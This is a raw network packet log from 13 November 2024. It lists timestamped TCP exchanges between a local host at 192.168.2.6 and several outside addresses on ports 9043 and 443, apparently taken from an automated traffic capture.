                                                                                                                                          Nov 13, 2024 18:20:12.112118006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112153053 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112155914 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112188101 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112210989 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112221956 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112256050 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112288952 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112322092 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112329006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112329006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112329006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112329006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112355947 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112396955 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112396955 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112880945 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112914085 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112955093 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112955093 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112966061 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113018990 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113053083 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113085032 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113089085 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113090038 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113090038 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113120079 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113137960 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113153934 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113187075 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.113215923 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113215923 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.113279104 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.536367893 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.536401987 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.537031889 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.537031889 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.648693085 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.648797989 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.648837090 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.648897886 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.649219036 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.760651112 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.760705948 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.760745049 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.760767937 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.760767937 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.760782957 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.760870934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.760870934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872344971 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872409105 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872442961 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872452021 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872474909 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872478962 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872502089 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872508049 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872536898 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872561932 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872561932 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872570038 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872647047 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.872694016 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.872694016 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996161938 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996234894 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996270895 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996285915 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996285915 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996303082 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996339083 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996342897 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996342897 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996373892 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996408939 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996412992 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996412992 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996442080 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996478081 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.996479034 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996479034 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.996539116 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095299006 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095330000 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095351934 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095349073 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095362902 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095375061 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095387936 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095396042 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095396042 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095413923 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095439911 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095762014 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095773935 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.095818996 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.095818996 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.207274914 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.207333088 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.207365990 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.207365990 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.207370043 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.207410097 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.207532883 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.207568884 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:13.207611084 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:13.207611084 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:21:01.603933096 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:01.611360073 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:01.611459017 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:01.611814022 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:01.616621017 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:03.500195026 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:03.500228882 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:03.500266075 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:03.500302076 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:03.500308990 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:03.500332117 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:03.500380993 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:03.527842045 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:03.532687902 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:04.027771950 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:04.027875900 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:04.028388023 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:04.033196926 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:05.420713902 CET90434998287.120.37.120192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:05.420830011 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:21:34.596707106 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:34.596745014 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:34.596878052 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:34.597105026 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:34.597116947 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.289212942 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.289352894 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.320858002 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.320869923 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.321099043 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.321217060 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.325433016 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.367322922 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.818970919 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.819050074 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.819056988 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.819204092 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.824327946 CET49988443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:35.824357033 CET44349988104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.858155966 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:35.858198881 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.858269930 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:35.858516932 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:35.858530998 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:36.742228031 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:36.742311954 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:36.745068073 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:36.745075941 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:36.745296001 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:36.745342970 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:36.745624065 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:36.787322998 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:37.521270037 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:37.521352053 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:37.521363974 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:37.521374941 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:37.521450043 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:37.530391932 CET49989443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:37.530405998 CET44349989104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:38.413924932 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.413960934 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:38.416524887 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.416840076 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.416851997 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:39.299232960 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:39.299333096 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:39.300765991 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:39.300765991 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:39.300789118 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:39.300800085 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.026766062 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.026833057 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:40.026845932 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.026884079 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:40.026889086 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.026913881 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.026923895 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:40.026946068 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:40.032001019 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:40.032023907 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.051101923 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.051150084 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.051275015 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.051512003 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.051527977 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.077202082 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.077306032 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:21:40.716434956 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.716650963 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.717036963 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.717050076 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:40.718137980 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:40.718151093 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:41.098921061 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:41.099004984 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:41.099056005 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:41.105921030 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:41.189357042 CET49991443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:41.189383030 CET44349991104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:41.324826002 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:41.324892044 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:41.325067043 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:41.325948000 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:41.325968027 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.395092964 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.395163059 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:42.395586014 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:42.395601034 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.396879911 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:42.396886110 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.412863970 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.412935972 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:21:42.661676884 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.661767960 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.661926031 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:42.662132025 CET49992443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:42.662156105 CET44349992104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.666662931 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:42.666712999 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:42.666836977 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:42.667087078 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:42.667100906 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:43.584212065 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:43.584275961 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:43.584667921 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:43.584676981 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:43.585704088 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:43.585709095 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:44.407830000 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:44.407923937 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:44.408020020 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:44.408020020 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:44.408327103 CET49993443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:44.408371925 CET44349993104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:44.424628019 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:44.424666882 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:44.424736023 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:44.424957991 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:44.424971104 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:45.442943096 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:45.443243980 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:45.443721056 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:45.443731070 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:45.444792032 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:45.444797039 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:46.241960049 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:46.242058992 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:46.242139101 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:46.331053972 CET49994443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:46.331110001 CET44349994104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:46.478857040 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:46.478914976 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:46.478991985 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:46.479269028 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:46.479284048 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.397777081 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.397877932 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.398204088 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.398215055 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.399147987 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.399152994 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.946233988 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.946444035 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.946475983 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.946559906 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.946692944 CET49995443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:47.946739912 CET44349995104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.954269886 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:47.954343081 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:47.955475092 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:47.955660105 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:47.955674887 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:48.622814894 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:48.622875929 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:48.623291016 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:48.623303890 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:48.624423027 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:48.624429941 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:49.027348042 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:49.027609110 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:49.027676105 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:49.070076942 CET49996443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:49.070100069 CET44349996104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:49.107549906 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:49.107592106 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:49.108093023 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:49.108093023 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:49.108133078 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.027394056 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.027585983 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:50.027991056 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:50.027997971 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.029105902 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:50.029119015 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.847740889 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.847861052 CET44349997104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:50.848263025 CET49997443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:21:50.848263025 CET49997443192.168.2.6104.21.15.162
